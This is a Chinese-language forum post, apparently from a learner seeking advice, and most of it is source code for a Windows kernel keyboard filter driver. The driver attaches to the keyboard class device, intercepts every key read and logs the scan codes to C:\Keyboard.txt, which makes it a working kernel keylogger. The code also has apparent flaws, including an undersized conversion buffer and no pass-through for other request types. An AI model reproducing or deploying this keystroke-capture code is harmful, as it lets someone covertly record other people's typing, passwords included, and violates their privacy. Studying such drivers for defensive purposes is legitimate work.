能力值:
( LV2,RANK:10 )
|
-
-
2 楼
该程序是把按键的扫描码记录下来,并写入C盘根目录下的文本文件里面!!希望有人可以指点指点小菜!
#include <ntddk.h>
#include <ntddkbd.h>
typedef BOOLEAN BOOL;
PETHREAD aThread; //文件读写线程
PDEVICE_OBJECT aDevice; //过滤设备对象
BOOL Ter = FALSE; //线程是否结束
ULONG num = 0; //计数器
HANDLE hFile; //文件句柄
ULONG data; //键盘数据
KSEMAPHORE sem; //信号量
NTSTATUS Attach(PDRIVER_OBJECT dri)
{
UNICODE_STRING str;
NTSTATUS status;
PDEVICE_OBJECT dev;
RtlInitUnicodeString(&str, L"\\Device\\KeyboardClass0");
status = IoCreateDevice(dri,
0,
0,
FILE_DEVICE_KEYBOARD,
0,
0,
&dev);
dev->Flags = dev->Flags | (DO_BUFFERED_IO | DO_POWER_PAGABLE);
dev->Flags = dev->Flags &~ DO_DEVICE_INITIALIZING;
status = IoAttachDevice(dev, &str, &aDevice);
return status;
}
void ThreadFunc(PVOID pContext)
{
IO_STATUS_BLOCK ioStatus;
UNICODE_STRING unicode;
ANSI_STRING ansi;
CHAR ch = ' ';
while(TRUE)
{
KeWaitForSingleObject(&sem, Executive, KernelMode, FALSE, NULL);
DbgPrint("waitting is ing!");
if(Ter == TRUE)
{
PsTerminateSystemThread(STATUS_SUCCESS);
}
unicode.Buffer = (PWSTR)ExAllocatePool(PagedPool, 8);
unicode.MaximumLength = 8;
RtlIntegerToUnicodeString(data, 16, &unicode);
DbgPrint("转换后的为:%wZ\n", &unicode);
RtlUnicodeStringToAnsiString(&ansi, &unicode, TRUE);
DbgPrint("ANSi 字符串为:%Z\n", &ansi);
ZwWriteFile(hFile,
0,
0,
0,
&ioStatus,
ansi.Buffer,
ansi.Length,
0,
0);
ZwWriteFile(hFile,
0,
0,
0,
&ioStatus,
&ch,
1,
0,
0);
RtlFreeAnsiString(&ansi);
RtlFreeUnicodeString(&unicode);
}
return;
}
NTSTATUS InitThread(PDRIVER_OBJECT dri)
{
NTSTATUS status;
HANDLE Thread;
UNREFERENCED_PARAMETER(dri);
status = PsCreateSystemThread(&Thread,
0,
0,
0,
0,
ThreadFunc,
0);
ObReferenceObjectByHandle(Thread, THREAD_ALL_ACCESS, NULL, KernelMode,
(PVOID*)&aThread, NULL);
ZwClose(Thread);
return status;
}
NTSTATUS ReadCom(PDEVICE_OBJECT dev, PIRP irp, PVOID Context)
{
PUCHAR buf;
PKEYBOARD_INPUT_DATA KeyData;
if(irp->IoStatus.Status == STATUS_SUCCESS)
{
buf = irp->AssociatedIrp.SystemBuffer;
KeyData = (PKEYBOARD_INPUT_DATA)buf;
data = KeyData->MakeCode;
DbgPrint("ScanCode:%x", data);
KeReleaseSemaphore(&sem, 0, 1, FALSE);
}
if(irp->PendingReturned)
{
IoMarkIrpPending(irp);
}
num--;
return irp->IoStatus.Status;
}
NTSTATUS ReadFunc(PDEVICE_OBJECT dev, PIRP irp)
{
IoCopyCurrentIrpStackLocationToNext(irp);
IoSetCompletionRoutine(irp,
ReadCom,
dev,
TRUE,
TRUE,
TRUE);
num++;
return IoCallDriver(aDevice, irp);
}
void Unload(PDRIVER_OBJECT dri)
{
LARGE_INTEGER timeout = RtlConvertLongToLargeInteger(-10*1000);
IoDetachDevice(aDevice);
while(num)
{
KeDelayExecutionThread(KernelMode, FALSE, &timeout);
}
Ter = TRUE;
KeReleaseSemaphore(&sem, 0, 1, FALSE);
KeWaitForSingleObject(aThread, Executive, KernelMode, FALSE, NULL);
IoDeleteDevice(dri->DeviceObject);
ZwClose(hFile);
return ;
}
NTSTATUS DriverEntry(PDRIVER_OBJECT dri, PUNICODE_STRING str)
{
NTSTATUS status;
UNICODE_STRING FileName;
OBJECT_ATTRIBUTES objectAttributes;
IO_STATUS_BLOCK iostatus;
UNREFERENCED_PARAMETER(str);
dri->MajorFunction[IRP_MJ_READ] = ReadFunc;
dri->DriverUnload = Unload;
KeInitializeSemaphore(&sem, 0, MAXLONG);
RtlInitUnicodeString(&FileName, L"\\??\\C:\\Keyboard.txt");
InitializeObjectAttributes(&objectAttributes,
&FileName,
OBJ_CASE_INSENSITIVE,
NULL,
NULL);
ZwCreateFile(&hFile,
GENERIC_WRITE,
&objectAttributes,
&iostatus,
NULL,
FILE_ATTRIBUTE_NORMAL,
0,
FILE_OVERWRITE_IF,
FILE_SYNCHRONOUS_IO_NONALERT,
0,
0);
status = Attach(dri);
InitThread(dri);
return status;
}
|